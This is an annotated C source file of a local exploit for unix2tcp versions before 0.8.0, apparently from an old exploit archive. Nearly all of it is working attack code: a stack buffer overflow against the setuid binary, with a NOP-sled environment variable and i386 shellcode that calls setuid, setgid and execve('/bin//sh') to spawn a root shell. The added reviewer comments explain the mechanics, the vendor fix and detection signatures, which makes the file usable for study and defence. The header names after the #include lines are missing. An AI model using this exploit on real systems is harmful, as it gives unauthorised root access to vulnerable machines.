/*
 * Lame local exploit for unix2tcp(<0.8.0) , http://dizzy.roedu.net/unix2tcp/
 * by n2n@linuxmail.org, Eye On Security Research Group [India],
 * http://www.eos-india.net
 *
 * Tested on Redhat Linux 9.0
 * Not of much use unless unix2tcp is installed suid.
 *
 * Solution: The vendor has released a fixed version (0.8.0), available at:
 *   http://dizzy.roedu.net/unix2tcp/unix2tcp-0.8.0.tar.gz
 *   http://dizzy.roedu.net/unix2tcp/unix2tcp-0.8.0.tar.bz2
 *
 * Reviewer notes:
 *  - The program hands an over-long first command-line argument to
 *    /usr/bin/unix2tcp. The vulnerable code itself is not shown on this page;
 *    presumably that argument is copied into a fixed-size stack buffer
 *    without a length check.
 *  - Impact depends on the setuid bit, as the author states. Upgrading to
 *    0.8.0 is the fix; where unix2tcp does not need to be setuid, clearing
 *    that bit removes the privilege boundary this relies on.
 *  - RET is a hard-coded stack address, so the listing assumes a fixed stack
 *    layout and an executable stack/environment area (assumption drawn from
 *    the constant and the env-var staging below, not stated by the author).
 *  - Detection: unix2tcp started with a first argument far longer than any
 *    legitimate value, or with an environment variable that is mostly 0x90
 *    bytes, matches what this program produces.
 */

/* The header names after each #include are missing from the page (likely
 * stripped as markup during extraction), so the listing does not compile
 * as shown. */
#include
#include
#include

/* Default offset, in bytes, from the start of the argument to the 4 bytes
 * that are overwritten with `ret` (see memcpy(buf+bufsize, ...) in main). */
#define BUFSIZE 122
/* Path of the target binary that is exec'd. */
#define VULN "/usr/bin/unix2tcp"
/* Hard-coded address written into the argument; argv[2] adjusts it. */
#define RET 0xbffff8e6

/*
 * Position-independent i386 Linux code using int 0x80. Reading the bytes:
 * syscall number 0x17 with ebx = 0 is issued twice, then 0x2e with ebx = 0,
 * then 0x0b (execve) on the pushed string "/bin//sh", then 0x01 (exit).
 * On Linux/i386 those numbers are setuid, setgid, execve and exit.
 * The "\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e" pair (push "//sh",
 * push "/bin") is a common byte pattern for content signatures.
 */
char shellcode[]=
    "\x31\xdb" "\x89\xd8" "\xb0\x17" "\xcd\x80"
    "\x31\xdb" "\x89\xd8" "\xb0\x17" "\xcd\x80"
    "\x31\xdb" "\x89\xd8" "\xb0\x2e" "\xcd\x80"
    "\x31\xc0" "\x50" "\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e"
    "\x89\xe3" "\x50" "\x53" "\x89\xe1" "\x31\xd2" "\xb0\x0b" "\xcd\x80"
    "\x31\xdb" "\x89\xd8" "\xb0\x01" "\xcd\x80";

/*
 * Builds the environment variable and the over-long argument, then replaces
 * this process with VULN.
 *
 * argv[1] (optional): overrides bufsize (default BUFSIZE).
 * argv[2] (optional): signed offset added to RET.
 *
 * Returns 0 only when execl() fails, since a successful execl() does not
 * return; the failure is not reported.
 */
int main(int argc,char **argv) {
    char *buf;
    unsigned long ret = RET;
    int offset=0;
    char egg[2048];
    int bufsize=BUFSIZE;

    printf("*********************************\n");
    printf("Exploit by n2n(n2n@linuxmail.org)\n");
    printf(" http://www.eos-india.net\n");
    printf("*********************************\n\n");

    /* atoi() gives no error indication, and neither value is range-checked
     * before it is used in the size and address arithmetic below. */
    if (argc>1) bufsize=atoi(argv[1]);
    if (argc>2) offset=atoi(argv[2]);

    /* The malloc() result is used without a NULL check. */
    buf=(char *)malloc((bufsize+10)*sizeof(char));
    ret = RET + offset;

    /* egg: 2048 bytes of 0x90 (the x86 NOP opcode) with the shellcode copied
     * so that it ends one byte before the end of the array, then exported
     * as the environment variable "payload", which the exec'd process
     * inherits. */
    memset(egg, 0x90, 2048);
    memcpy ((egg+(2048-strlen(shellcode)-1)), shellcode, strlen(shellcode));
    setenv("payload", egg, 1);

    /* buf: filled with 'A' (0x41), the first 4 bytes of `ret` placed at
     * offset bufsize, and a terminating NUL right after them.
     * NOTE(review): copying 4 bytes of an unsigned long assumes a 32-bit
     * little-endian target, consistent with the i386 shellcode. */
    memset(buf,0x41,bufsize+10);
    memcpy(buf+bufsize,(char *)&ret,4);
    buf[bufsize+4] = 0x00;

    /* buf becomes argv[1] of unix2tcp; the two "31337" strings are argv[2]
     * and argv[3]. Their meaning to unix2tcp is not shown on this page. */
    execl(VULN,VULN,buf,"31337","31337",0);
    return 0;
}